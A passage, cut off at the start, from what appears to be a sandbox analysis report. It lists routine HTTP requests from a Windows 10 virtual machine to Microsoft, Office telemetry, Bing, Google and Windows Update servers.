+TTcNSy5u/mXS/p4R7jtRGA955fu6tfG/o0Ijltx+mmBuT9iaS9kvikqQl8kYh4RIOyu7xDPAX9Rh9nGtOYwbmP4P+KXUI2aglfUThAiyek9mKSls8yNMzbH9frwIClkcwY0P4DRwz0igqszKMwQh8cTjiz5t9qMW2xf6+1Ypf30Y8nWKRSpviHkAzCcPn9jvLMCB2PdZeGEx0Dvh0u4iPjedZl7YVkLln+0417uqBSxq/zPGV+aTWsEPBKVvFTRNGVasjBYhtgB&p=Cache-Control: no-cacheMS-CV: BIV/rQ3HEUi8aNLi.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0Host: arc.msn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338387&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241208T123116Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=70e93d94502c40d5bf8c3719db3e3330&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=619573&metered=false&nettype=ethernet&npid=sc-338387&oemName=VMware%2C%20Inc.&oemid=Public&ossku=Professional&rver=2&sc-mode=0&scmid=Public&smBiosDm=VMware20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=619573&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=&svoffered=0 HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: cid=531174684,531174684,530725852&chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AASp0AqrsC9r/xwFl+z2y2UsBJJfgRDz+895SPUhgR6pcAWcIIP2oJrW+1j3pNyTqKgRupi9+l1kJ+SvaCNMGWfE3cO1gKXxNKCEWczPo11P7s99D0mu8SGlDRLLPM9Mx0hF41kYjjomrPdDZomjT9UrkuKHyTa2lMdMuGh8DCwVmwaOHHA3EEUvZ0kds4UxJFdn7A28+lzZrl4opVyHpcs6tRluUJlzTmpHAcryi7aGuNd2Lg1eVpOSOGqEeqRw0Rx7XgSH5lttOsQd4lOIs4P1GKZE/GpqSa+tC+5pa1uv0S9Au/bTolRfZjx08hfs8hLfG289zNOES14CScPq2tMgQZgAAEELAwAzTUGUV43IS9cSUt6CwAZ5xTWQmNtlbI5yvrvYJoeDM6i2cwWhkErkXIaLcjq73TIdKjP2imZldo5PjlIxcH7jnWIrBQHB5N6oqBC/AOvAr3B9EckkAGJVnp1U8XuiOsWHmc1Svv3Vlc2+nwnIMfGB8YvtWGXBRm9soCCLXYtGi1QiDpUb6hSuyecduMUfRe3wgWg8RRTaVo9VJ4O2P0SfBiFMI3H8GL+E2SlbVob12epGXjSdveoFPe1EuNabu7NSH/abk/F1XuxAqWqreCrITO1J8F9JyOvi+5dWRtV8XTvAVcCpk/jDsuQy9IjipdZVEXDXgPxwO+TTcNSy5u/mXS/p4R7jtRGA955fu6tfG/o0Ijltx+mmBuT9iaS9kvikqQl8kYh4RIOyu7xDPAX9Rh9nGtOYwbmP4P+KXUI2aglfUThAiyek9mKSls8yNMzbH9frwIClkcwY0P4DRwz0igqszKMwQh8cTjiz5t9qMW2xf6+1Ypf30Y8nWKRSpviHkAzCcPn9jvLMCB2PdZeGEx0Dvh0u4iPjedZl7YVkLln+0417uqBSxq/zPGV+aTWsEPBKVvFTRNGVasjBYhtgB&p=Cache-Control: no-cacheMS-CV: BIV/rQ3HEUi8aNLi.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0Host: arc.msn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239399109664_12R6JVR4SJZQSTHCV&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239356819466_1PN1118HHI92HRAXE&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239399230510_1EL19IE1YUCVQBSJB&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239399230509_1P8TI1N52GIEG4TVD&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239399109665_1344PV668L57B53FJ&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239356819467_11XRGHD2R08E7TNPP&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239337201808_1NREAF5SJS6TG8GUU&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: www.bing.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239401719378_1QE5OGFYA33L2ZPDG&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239401719379_1QJHVIFGU1A436B66&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239385875217_1AS9NW8J4VEXSVA8E&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239385875220_1FZJ7DDRUSKY0IVFA&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v1/a/impression?CID=128000000001615609&region=CH&lang=EN-CH%2CEN-GB&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.19041.1023&mo=&cap=&EID=&&PID=426081542&UIT=M-&TargetID=1&AN=311176752&PG=PC000P0FR5.0000000IRU&REQASID=0E7CE6B6AC244AB98054235EFE6BCC46&UNID=338389&ASID=34e77c2273584e07b7d7b447b5142ea0&&DS_EVTID=0E7CE6B6AC244AB98054235EFE6BCC46&DEVOSVER=10.0.19045.2006&REQT=20241208T123102&TIME=20241208T123109Z&ARCRAS=&CLR=CDM HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: ris.api.iris.microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlKHLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlKHLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /v1/a/impression?CID=128000000001615609&region=CH&lang=EN-CH%2CEN-GB&oem=&devFam=WINDOWS.DESKTOP&ossku=PROFESSIONAL&cmdVer=10.0.19041.1023&mo=&cap=&EID=&&PID=426081542&UIT=M-&TargetID=1&AN=311176752&PG=PC000P0FR5.0000000IRU&REQASID=0E7CE6B6AC244AB98054235EFE6BCC46&UNID=338389&ASID=34e77c2273584e07b7d7b447b5142ea0&&DS_EVTID=0E7CE6B6AC244AB98054235EFE6BCC46&DEVOSVER=10.0.19045.2006&REQT=20241208T123102&TIME=20241208T123109Z&ARCRAS=&CLR=CDM HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: ris.api.iris.microsoft.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=F6mZw79N1evM2Hy&MD=+abDNPzz HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
